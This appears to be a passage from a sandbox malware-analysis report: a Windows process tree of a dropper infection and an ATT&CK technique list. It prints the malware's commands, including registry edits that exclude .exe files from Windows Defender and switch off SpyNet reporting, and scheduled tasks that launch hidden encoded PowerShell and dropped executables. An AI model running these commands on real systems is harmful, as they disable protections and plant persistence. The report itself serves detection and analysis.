"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
8⤵
PID:4500

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
9⤵
PID:4492

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
10⤵
PID:1092

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
10⤵
PID:2784

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
8⤵
PID:4476

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
9⤵
PID:4824

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
10⤵
PID:4768

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
10⤵
PID:4832

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gtjhlWvCs" /SC once /ST 09:53:54 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
8⤵
- Creates scheduled task(s)
PID:2060

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gtjhlWvCs"
8⤵
PID:4652

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gtjhlWvCs"
8⤵
PID:1840

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
9⤵
PID:4476

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 11:53:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\anTLtxq.exe\" j6 /site_id 525403 /S" /V1 /F
8⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3520

C:\Users\Admin\Documents\s2lcELj867qKZLN9NW9aVgla.exe
"C:\Users\Admin\Documents\s2lcELj867qKZLN9NW9aVgla.exe"
5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:4360

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
6⤵
PID:2408

C:\Users\Admin\Documents\LG5yi198T0Dq20rW9f_qRVJ8.exe
"C:\Users\Admin\Documents\LG5yi198T0Dq20rW9f_qRVJ8.exe"
5⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
PID:4352

C:\Users\Admin\AppData\Local\Temp\dada.exe
"C:\Users\Admin\AppData\Local\Temp\dada.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:4400

C:\Users\Admin\AppData\Local\Temp\build.exe
"C:\Users\Admin\AppData\Local\Temp\build.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
PID:456

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Cache-S-21-2946144819-3e21f723 /TR "C:\Users\Admin\AppData\Local\cache\MoUSO.exe"
7⤵
- Creates scheduled task(s)
PID:4220

C:\Users\Admin\Documents\Xf17AV2e_ecudY2tzrMhCwVx.exe
"C:\Users\Admin\Documents\Xf17AV2e_ecudY2tzrMhCwVx.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Checks processor information in registry
PID:4668

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
6⤵
- Blocklisted process makes network request
PID:4628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 624
6⤵
- Program crash
PID:4432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 888
6⤵
- Program crash
PID:2264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 888
6⤵
- Program crash
PID:4840

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
6⤵
- Blocklisted process makes network request
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:5000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 872
6⤵
- Program crash
PID:1860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 1084
6⤵
- Program crash
PID:4704

C:\Users\Admin\Documents\1pTBWPkfr7lqlST6OW1pQfdc.exe
"C:\Users\Admin\Documents\1pTBWPkfr7lqlST6OW1pQfdc.exe"
5⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4772

C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe
"C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe"
6⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2776

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
6⤵
PID:3988

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:824

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
6⤵
PID:1520

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sotema_5.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:2656

C:\Users\Admin\AppData\Local\Temp\7zSC9D02DBD\sotema_5.exe
sotema_5.exe
4⤵
- Executes dropped EXE
PID:3888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1260 -ip 1260
1⤵
PID:2904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4104 -ip 4104
1⤵
PID:4928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4404 -ip 4404
1⤵
PID:4572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4152 -ip 4152
1⤵
PID:2024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4104 -ip 4104
1⤵
PID:4464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4272 -ip 4272
1⤵
PID:5048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 3732 -ip 3732
1⤵
PID:3456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4272 -ip 4272
1⤵
PID:2256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4152 -ip 4152
1⤵
PID:3108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4404 -ip 4404
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1880

C:\Users\Admin\Documents\Xd7n95TtqtWnH3UnglLX08Tk.exe
"C:\Users\Admin\Documents\Xd7n95TtqtWnH3UnglLX08Tk.exe"
2⤵
- Executes dropped EXE
PID:3732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4668 -ip 4668
1⤵
PID:3324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4112 -ip 4112
1⤵
PID:4792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4152 -ip 4152
1⤵
PID:3280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4340 -ip 4340
1⤵
PID:4948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 4152 -ip 4152
1⤵
PID:5060

C:\Windows\SysWOW64\bpqixmat\yqwxfxyn.exe
C:\Windows\SysWOW64\bpqixmat\yqwxfxyn.exe /d"C:\Users\Admin\Documents\dH4pVYzAWP2X8NCSEdV6ffFH.exe"
1⤵
PID:2464

C:\Windows\SysWOW64\svchost.exe
svchost.exe
2⤵
PID:4492

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2464 -s 532
2⤵
- Program crash
PID:3748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2120 -ip 2120
1⤵
PID:1756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4152 -ip 4152
1⤵
PID:4780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2464 -ip 2464
1⤵
PID:4344

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4152 -ip 4152
1⤵
PID:4828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4152 -ip 4152
1⤵
PID:2980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4152 -ip 4152
1⤵
PID:4972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 4152 -ip 4152
1⤵
PID:2256

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:1676

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:3164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 4668 -ip 4668
1⤵
PID:4568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4668 -ip 4668
1⤵
PID:5072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 4668 -ip 4668
1⤵
PID:4424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4668 -ip 4668
1⤵
PID:4160

C:\Users\Admin\AppData\Local\cache\MoUSO.exe
C:\Users\Admin\AppData\Local\cache\MoUSO.exe
1⤵
PID:1920

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 404 -p 3980 -ip 3980
1⤵
PID:2440

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 420 -p 3752 -ip 3752
1⤵
PID:1552

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

New Service

T1050

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

New Service

T1050

Scheduled Task

T1053

Defense Evasion

Modify Registry

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

Virtualization/Sandbox Evasion

T1497

System Information Discovery